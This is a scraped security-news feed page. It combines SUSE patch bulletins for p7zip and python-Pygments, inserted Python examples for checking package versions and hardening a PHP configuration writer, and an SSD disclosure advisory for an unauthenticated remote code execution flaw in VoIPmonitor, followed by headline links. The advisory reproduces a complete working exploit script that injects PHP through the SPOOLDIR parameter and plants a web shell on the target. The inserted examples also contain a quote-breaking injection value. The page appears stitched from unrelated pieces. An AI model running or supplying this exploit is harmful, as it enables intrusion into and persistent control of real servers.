Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Module for Basesystem 15-SP3:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP3-2021-1491=1
o SUSE Linux Enterprise Module for Basesystem 15-SP2:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-1491=1

Package List:

o SUSE Linux Enterprise Module for Basesystem 15-SP3 (aarch64 ppc64le s390x
x86_64):
p7zip-16.02-14.5.1
p7zip-debugsource-16.02-14.5.1
o SUSE Linux Enterprise Module for Basesystem 15-SP2 (aarch64 ppc64le s390x
x86_64):
p7zip-16.02-14.5.1
p7zip-debugsource-16.02-14.5.1
p7zip-full-16.02-14.5.1
p7zip-full-debuginfo-16.02-14.5.1

References:

o https://www.suse.com/security/cve/CVE-2021-3465.html
o https://bugzilla.suse.com/1184699

- --------------------------END INCLUDED TEXT--------------------


https://malwaredevil.com/2021/05/06/esb-2021-1553-unix-linuxsuse-p7zip-denial-of-service-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1553-unix-linuxsuse-p7zip-denial-of-service-existing-account

ESB-2021.1554 – [SUSE] python-Pygments: Denial of service – Remote/unauthenticated

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1554
Security update for python-Pygments
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product: python-Pygments
Publisher: SUSE
Operating System: SUSE
Impact/Access: Denial of Service -- Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-20270

Reference: ESB-2021.1206
ESB-2021.0988
ESB-2021.0903
ESB-2021.0890

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211500-1

- --------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for python-Pygments

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1500-1
Rating: important
References: #1183169
Cross-References: CVE-2021-20270
Affected Products:
SUSE Linux Enterprise Server for SAP 15
SUSE Linux Enterprise Server 15-LTSS
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2
SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-ESPOS
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for python-Pygments fixes the following issues:

o CVE-2021-20270: Fixed an infinite loop in SML lexer which may lead to DoS
(bsc#1183169)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2021-1500=1
o SUSE Linux Enterprise Server 15-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-2021-1500=1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3:
zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-SP3-2021-1500=1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2:
zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-SP2-2021-1500=1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1500=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1500=1

Package List:

o SUSE Linux Enterprise Server for SAP 15 (noarch):
python3-Pygments-2.2.0-4.6.1
o SUSE Linux Enterprise Server 15-LTSS (noarch):
python3-Pygments-2.2.0-4.6.1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3 (noarch):
python2-Pygments-2.2.0-4.6.1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2 (noarch):
python2-Pygments-2.2.0-4.6.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (noarch):
python3-Pygments-2.2.0-4.6.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (noarch):
python3-Pygments-2.2.0-4.6.1

References:

o https://www.suse.com/security/cve/CVE-2021-20270.html
o https://bugzilla.suse.com/1183169

- --------------------------END INCLUDED TEXT--------------------
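
A verification step the three SUSE bulletins above (openexr, p7zip, python-Pygments) leave to the reader is confirming that the builds actually installed on a host are at or above the fixed name-version-release strings in each Package List. The following is an added example, not SUSE's or AusCERT's code: the fixed strings are copied from the bulletins, the installed-package sample is constructed for the example, and the version comparison is a simplified port of rpm's algorithm (tilde and caret ordering are not handled). On a real host the same function would be fed the output of `rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}\n'`.

```python
import re

# Fixed builds copied from the bulletins' Package Lists (name-version-release).
FIXED_NVRS = [
    "libIlmImf-2_2-23-2.2.1-3.27.1",
    "libIlmImfUtil-2_2-23-2.2.1-3.27.1",
    "openexr-devel-2.2.1-3.27.1",
    "p7zip-16.02-14.5.1",
    "p7zip-full-16.02-14.5.1",
    "python3-Pygments-2.2.0-4.6.1",
]

# Constructed sample of what `rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}\n'`
# might print on a host; these installed builds are invented for the example.
INSTALLED_SAMPLE = """\
libIlmImf-2_2-23-2.2.1-3.24.2
libIlmImfUtil-2_2-23-2.2.1-3.27.1
p7zip-16.02-14.5.1
python3-Pygments-2.2.0-4.3.1
bash-4.4-19.6.1
"""

_SEGMENT = re.compile(r"[0-9]+|[A-Za-z]+")


def split_nvr(nvr):
    """Split 'name-version-release' on the last two hyphens; package names
    may themselves contain hyphens (libIlmImf-2_2-23), version and release
    do not."""
    name, version, release = nvr.rsplit("-", 2)
    return name, version, release


def rpmvercmp(a, b):
    """Simplified port of rpm's version comparison (tilde and caret are not
    handled): walk the alternating numeric/alphabetic segments; numeric
    segments compare as integers, alphabetic ones lexically, a numeric
    segment outranks an alphabetic one, and when the shared prefix is equal
    the string with more segments is newer. Returns -1, 0 or 1."""
    seg_a, seg_b = _SEGMENT.findall(a), _SEGMENT.findall(b)
    for x, y in zip(seg_a, seg_b):
        x_num, y_num = x.isdigit(), y.isdigit()
        if x_num != y_num:
            return 1 if x_num else -1
        if x_num:
            x, y = int(x), int(y)
        if x != y:
            return 1 if x > y else -1
    return (len(seg_a) > len(seg_b)) - (len(seg_a) < len(seg_b))


def is_fixed(installed_nvr, fixed_nvr):
    """True when the installed version-release is at or above the fixed one."""
    _, iv, ir = split_nvr(installed_nvr)
    _, fv, fr = split_nvr(fixed_nvr)
    order = rpmvercmp(iv, fv) or rpmvercmp(ir, fr)
    return order >= 0


def find_unpatched(installed_text, fixed_nvrs):
    """Return installed packages named in the bulletin that are still below
    the fixed build; packages the bulletin does not mention are ignored."""
    fixed = {split_nvr(n)[0]: n for n in fixed_nvrs}
    unpatched = []
    for line in installed_text.splitlines():
        line = line.strip()
        if not line:
            continue
        name = split_nvr(line)[0]
        if name in fixed and not is_fixed(line, fixed[name]):
            unpatched.append(line)
    return sorted(unpatched)


if __name__ == "__main__":
    for pkg in find_unpatched(INSTALLED_SAMPLE, FIXED_NVRS):
        print("still vulnerable:", pkg)
```

Comparing version and release separately matters here: all three bulletins keep the upstream version (2.2.1, 16.02, 2.2.0) and bump only the release, so a check that looks at the version string alone would report a vulnerable host as patched.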


https://malwaredevil.com/2021/05/06/esb-2021-1554-suse-python-pygments-denial-of-service-remote-unauthenticated/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1554-suse-python-pygments-denial-of-service-remote-unauthenticated

SSD Advisory – VoIPmonitor UnAuth RCE

TL;DR

Find out how a vulnerability in VoIPmonitor allows an unauthenticated attacker to execute arbitrary code.

Vulnerability Summary

VoIPmonitor is “open source network packet sniffer with commercial frontend for SIP RTP and RTCP VoIP protocols running on linux”.

Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.

CVE

CVE-2021-30461

Credit

An independent security researcher, Furkan Goksel, has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions

VoIPmonitor version 24.60 and prior

Vendor Response

“A new GUI release 24.61 is fixing this security issue.”

Vulnerability Analysis

Due to improper filtering of user-supplied input, an attacker is able to run commands through the PHP application behind VoIPmonitor's web UI.

The vulnerability is triggered by a POST request to the index.php file that carries the SPOOLDIR and recheck parameters.

This is because the SPOOLDIR value is written into the config/configuration.php file, which the UI later includes.

The SPOOLDIR value is placed "as is" into the PHP source code, allowing remote attackers to insert arbitrary commands along with the intended value for this parameter.
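
The pattern the analysis above describes, next to the hardened form a defender would want, as an added example that is not VoIPmonitor's code: the template, the `$SPOOLDIR` variable name and the file layout are assumptions made for illustration, `ALLOWED_PATH` is an assumed allow-list, and `audit_config` is an administrator-side check that an existing configuration.php still holds a plain quoted path rather than something that closed the literal and continued as PHP.

```python
import re

# Assumed shape of the generated file, for illustration only; VoIPmonitor's
# real config/configuration.php is not reproduced here.
UNSAFE_TEMPLATE = '<?php\n$SPOOLDIR = "{value}";\n'

# Allow-list for the spool directory: an absolute path made of ordinary path
# characters. Anything else (quotes, semicolons, '$', spaces) is rejected.
ALLOWED_PATH = re.compile(r"/[A-Za-z0-9._-]+(?:/[A-Za-z0-9._-]+)*/?")

# Matches a $SPOOLDIR assignment line inside a configuration file.
ASSIGN_RE = re.compile(r"^\$SPOOLDIR\s*=\s*(.*);\s*$", re.M)


def unsafe_render_config(spooldir):
    """The flawed pattern the advisory describes: the request parameter lands
    between the quotes of a PHP string literal with no validation or escaping.
    A value containing a double quote closes the literal, and whatever follows
    is parsed as PHP the next time the file is included."""
    return UNSAFE_TEMPLATE.format(value=spooldir)


def php_single_quoted(value):
    """Render value as a PHP single-quoted literal. PHP does no variable
    interpolation inside single quotes, and only backslash and the quote
    itself are special there, so escaping those two characters suffices."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def safe_render_config(spooldir):
    """Hardened writer: reject anything outside the allow-list (including
    '..' segments), then emit an escaped literal so the file stays data."""
    if not ALLOWED_PATH.fullmatch(spooldir) or ".." in spooldir.split("/"):
        raise ValueError(f"rejected SPOOLDIR value: {spooldir!r}")
    return f"<?php\n$SPOOLDIR = {php_single_quoted(spooldir)};\n"


def audit_config(text):
    """Administrator-side check for an existing configuration.php: return the
    right-hand side of every $SPOOLDIR assignment that is not a plain quoted
    path. A value that closed the quote and continued with PHP syntax, or a
    path outside the allow-list, is reported so the file can be inspected."""
    findings = []
    for match in ASSIGN_RE.finditer(text):
        rhs = match.group(1)
        quoted = re.fullmatch(r"""(['"])([^'"\\]*)\1""", rhs)
        if quoted is None or not ALLOWED_PATH.fullmatch(quoted.group(2)):
            findings.append(rhs)
    return findings


if __name__ == "__main__":
    # Constructed inputs: a benign path and a value that breaks out of the
    # literal in the unsafe writer (a harmless print, for demonstration).
    for value in ("/var/spool/voipmonitor", '/tmp".print(1)."'):
        rendered = unsafe_render_config(value)
        print("unsafe writer, audit flagged:", audit_config(rendered))
        try:
            print("safe writer:", safe_render_config(value), end="")
        except ValueError as err:
            print("safe writer:", err)
```

The allow-list is the real control; the escaping is defence in depth for the day the allow-list is loosened. Writing configuration as executable PHP at all is the root of the problem, so a writer that stores the value in a non-executable format (JSON, ini) and reads it back at runtime removes the code-injection class entirely.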

Exploit

import argparse
from sys import argv, exit
import time
import random
import string
try:
    import requests
except ImportError:
    print("pip3 install requests ")

print("""
###############################################
#              VOIP Monitor RCE               #
###############################################
""")

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"}


def get_target(args):
    hostname = args.host
    path = args.path
    if path:
        return f"http://{hostname}/{path}/index.php"
    else:
        return f"http://{hostname}/index.php"


def set_tmp(args):
    # Restore SPOOLDIR to a plain value so the config file parses again.
    global headers
    target = get_target(args)
    n_data = {"SPOOLDIR": "/tmp", "recheck": "annen"}
    set_totmp = requests.post(target, n_data, headers=headers)
    print(f"[*] set /tmp {set_totmp}")


def checkVulnerability(args):
    global headers
    target = get_target(args)
    print(f"[+] Attacking {target}")
    testcmd = {"SPOOLDIR": "test\".system(id).\"", "recheck": "annen"}
    response_text = b"uid="
    testcmd_req = requests.post(target, testcmd, verify=False, headers=headers)
    if response_text in testcmd_req.content:
        print("[*] host is vulnerable")
    else:
        print("[-] host is not vulnerable")
        exit()


def uploadshell(args):
    global headers
    hostname = args.host
    path = args.path
    shell_path = ""
    shellfilename = str(''.join(random.choice(string.ascii_lowercase) for i in range(10)))
    target = get_target(args)
    rce_payload = {"SPOOLDIR": f"/tmp\".file_put_contents('{shellfilename}.php','<?php echo system($_GET[\"a\"]);').\"", "recheck": "annen"}
    rce_req = requests.post(target, headers=headers, data=rce_payload)
    print(f"[*] uploading shell {rce_req.status_code}")
    if path:
        shell_path = f"http://{hostname}/{path}/{shellfilename}.php"
    else:
        shell_path = f"http://{hostname}/{shellfilename}.php"
    shell_check = requests.get(shell_path, headers=headers, params={'a': 'id'})
    print(f"[*] RCE Check : {shell_check.text}")
    print(f"[*] Your Shell at {shell_path}")


def main():
    parser = argparse.ArgumentParser(description='VoIP Monitor all versions command execution')
    parser.add_argument('-t', '--host', help='Host', type=str)
    parser.add_argument('-b', '--path', help='Path of the VoIP Monitor', type=str)
    args = parser.parse_args()
    set_tmp(args)
    checkVulnerability(args)
    set_tmp(args)
    uploadshell(args)
    set_tmp(args)


if __name__ == "__main__":
    main()

https://malwaredevil.com/2021/05/06/ssd-advisory-voipmonitor-unauth-rce/?utm_source=rss&utm_medium=rss&utm_campaign=ssd-advisory-voipmonitor-unauth-rce

ISC Stormcast For Thursday, May 6th, 2021 https://isc.sans.edu/podcastdetail.html?id=7488, (Thu, May 6th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

https://malwaredevil.com/2021/05/06/isc-stormcast-for-thursday-may-6th-2021-https-isc-sans-edu-podcastdetail-htmlid7488-thu-may-6th/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-thursday-may-6th-2021-https-isc-sans-edu-podcastdetail-htmlid7488-thu-may-6th

Wednesday, May 5, 2021

SemperFi: A Spoofer Eliminating GPS Receiver for UAVs

https://malwaredevil.com/2021/05/05/semperfi-a-spoofer-eliminating-gps-receiver-for-uavs-2/?utm_source=rss&utm_medium=rss&utm_campaign=semperfi-a-spoofer-eliminating-gps-receiver-for-uavs-2

Security Questionnaires: Why You Received One and How to Answer It Effectively

Information security used to be much simpler—or at least it seemed to be, right? In the past, most …

The post Security Questionnaires: Why You Received One and How to Answer It Effectively appeared first on Hyperproof.

https://malwaredevil.com/2021/05/05/security-questionnaires-why-you-received-one-and-how-to-answer-it-effectively/?utm_source=rss&utm_medium=rss&utm_campaign=security-questionnaires-why-you-received-one-and-how-to-answer-it-effectively

How to manage the cyber risks of the future?

The World Economic Forum poses this question: will our individual and collective approach to managing cyber risks be sustainable in the face of the major technology trends that will unfold in the near future?

A recent study by the World Economic Forum

The post How to manage the cyber risks of the future? appeared first on ManageEngine Blog.

https://malwaredevil.com/2021/05/05/como-gestionar-los-riesgos-ciberneticos-del-futuro/?utm_source=rss&utm_medium=rss&utm_campaign=como-gestionar-los-riesgos-ciberneticos-del-futuro

[Valve] critical – Specially Crafted Closed Captions File can lead to Remote Code Execution in CS:GO and other Source Games (7500.00USD)

https://malwaredevil.com/2021/05/05/valve-critical-specially-crafted-closed-captions-file-can-lead-to-remote-code-execution-in-csgo-and-other-source-games-7500-00usd-2/?utm_source=rss&utm_medium=rss&utm_campaign=valve-critical-specially-crafted-closed-captions-file-can-lead-to-remote-code-execution-in-csgo-and-other-source-games-7500-00usd-2

SemperFi: A Spoofer Eliminating GPS Receiver for UAVs

https://malwaredevil.com/2021/05/05/semperfi-a-spoofer-eliminating-gps-receiver-for-uavs/?utm_source=rss&utm_medium=rss&utm_campaign=semperfi-a-spoofer-eliminating-gps-receiver-for-uavs

Account takeover of Instagram accounts due to unrestricted permissions of third-party application’s generated tokens

https://malwaredevil.com/2021/05/05/account-takeover-of-instagram-accounts-due-to-unrestricted-permissions-of-third-party-applications-generated-tokens-2/?utm_source=rss&utm_medium=rss&utm_campaign=account-takeover-of-instagram-accounts-due-to-unrestricted-permissions-of-third-party-applications-generated-tokens-2

How I Hacked Google App Engine: Anatomy of a Java Bytecode Exploit

https://malwaredevil.com/2021/05/05/how-i-hacked-google-app-engine-anatomy-of-a-java-bytecode-exploit-2/?utm_source=rss&utm_medium=rss&utm_campaign=how-i-hacked-google-app-engine-anatomy-of-a-java-bytecode-exploit-2

The speed of business is fast – is your PKI keeping up?

Over the last couple of decades, PKI has grown – both in its application and its overall footprint within our…

The post The speed of business is fast – is your PKI keeping up? appeared first on Entrust Blog.

https://malwaredevil.com/2021/05/05/the-speed-of-business-is-fast-is-your-pki-keeping-up/?utm_source=rss&utm_medium=rss&utm_campaign=the-speed-of-business-is-fast-is-your-pki-keeping-up

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...